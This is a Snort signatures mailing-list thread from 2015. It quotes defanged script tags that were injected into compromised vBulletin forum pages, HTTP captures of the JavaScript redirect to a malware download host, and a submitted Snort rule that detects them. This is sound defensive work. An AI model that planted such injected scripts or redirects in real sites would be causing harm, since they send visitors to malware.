'Re: [Snort-sigs] Compromised vBulletin sig'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       snort-sigs
Subject:    Re: [Snort-sigs] Compromised vBulletin sig
From:       Matt Mickel <mmickel () sourcefire ! com>
Date:       2015-04-30 18:49:42
Message-ID: 55427946.1010609 () sourcefire ! com
[Download RAW message or body]

Hi, James-

This rule has been reviewed and added to the community ruleset.  I 
removed the PCRE from the committed version and instead used the within 
content modifier.  This made the rule much more efficient while still 
detecting the relevant content.  Thanks so much for your submission.  
Cheers,

Matt Mickel

On 04/16/2015 01:30 PM, James Lay wrote:
> Didn't see this in any current ruleset, so I thought I'd post it here.
> Yesterday I saw two of these.  Injected into the vBulletin initial page:
> 
> <script type="text/javascript"
> src="meow://meh[.]com/misc.php?v=364&amp;js=js"></script>
> <script type="text/javascript"
> src="meow://bleh[.]com/forums/misc.php?v=420&amp;js=js"></script>
> 
> 
> #######################################################################################
>  GET /misc.php?v=364&js=js HTTP/1.1
> Accept: application/javascript, */*;q=0.8
> Referer:
> meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
> Accept-Language: en-US
> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
> Trident/5.0)
> Accept-Encoding: gzip, deflate
> Host: meh.com
> Cookie: __cfduid=bleh; bbsessionhash=bleh; bblastvisit=1429113507;
> bblastactivity=0
> Cache-Control: max-stale=0
> Connection: Keep-Alive
> Pragma: no-cache
> 
> HTTP/1.1 200 OK
> Date: Wed, 15 Apr 2015 15:58:25 GMT
> Content-Type: text/html; charset=ISO-8859-1
> Transfer-Encoding: chunked
> Connection: keep-alive
> Expires: 0
> Cache-Control: private, post-check=0, pre-check=0, max-age=0
> Pragma: no-cache
> Set-Cookie: bblastactivity=0; expires=Thu, 14-Apr-2016 15:58:27 GMT;
> path=/
> Set-Cookie: bblang_id=en; expires=Thu, 16-Apr-2015 01:58:27 GMT
> X-Powered-By: PleskLin
> Server: cloudflare-nginx
> CF-RAY: 1d78da121f59012e-SJC
> Content-Encoding: gzip
> 
> document.location='meow://filestore72[.]info/download.php?id=f823cc00'
> #######################################################################################
>  
> This in turn goes to:
> 
> #######################################################################################
>  GET /download.php?id=f823cc00 HTTP/1.1
> Accept: text/html, application/xhtml+xml, */*
> Referer:
> meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
> Accept-Language: en-US
> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
> Trident/5.0)
> Accept-Encoding: gzip, deflate
> Host: filestore72[.]info
> Cache-Control: max-stale=0
> Connection: Keep-Alive
> Pragma: no-cache
> 
> HTTP/1.1 302 Moved Temporarily
> Server: nginx/1.0.12
> Date: Wed, 15 Apr 2015 15:53:40 GMT
> Content-Type: text/html
> Content-Length: 161
> Connection: close
> Location:
> meow://pdta23sj9kkdl9wwtakzzhf.antalyagunlukkiralik[.]org/index.php?z=Z2xham91PWtuY2 \
> h2JnRpbWU9MTUwNDE1MTU0NTI1ODI3MDI4MSZzcmM9NzYmc3VybD1maWxlc3RvcmU3Mi5pbmZvJnNwb3J0PTgwJmtleT0yN0ExMzA0MSZzdXJpPS9kb3dubG9hZC5waHAlM2ZpZD1mODIzY2MwMA==
>  
> <html>
> <head><title>302 Found</title></head>
> <body bgcolor="white">
> <center><h1>302 Found</h1></center>
> <hr><center>nginx/1.0.12</center>
> </body>
> </html>
> #######################################################################################
>  
> 
> Seems to be old-ish news, but the sig is below:
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS
> (msg:"SERVER-WEBAPP Compromised vbulletin site";
> flow:established,to_server; uricontent:"/misc.php?"; uricontent:"v=";
> uricontent:"js=js"; pcre:"/misc.php\x3Fv\x3D[0-9]{3}\x26js\x3Djs/Ui";
> reference:url,http://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions \
> -problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info;
>  classtype:bad-unknown; sid:10000156; rev:1;)
> 
> As usual, not sure if I have this perfect so anything to improve this
> sig would be excellent.  Thank you.
> 
> James
> 
> ------------------------------------------------------------------------------
> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
> Develop your own process in accordance with the BPMN 2 standard
> Learn Process modeling best practices with Bonita BPM through live exercises
> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- event?utm_
> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
> _______________________________________________
> Snort-sigs mailing list
> Snort-sigs@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/snort-sigs
> http://www.snort.org
> 
> 
> Please visit http://blog.snort.org for the latest news about Snort!


------------------------------------------------------------------------------
One dashboard for servers and applications across Physical-Virtual-Cloud 
Widest out-of-the-box monitoring support with 50+ applications
Performance metrics, stats and reports that give you Actionable Insights
Deep dive visibility with transaction tracing using APM Insight.
http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
_______________________________________________
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic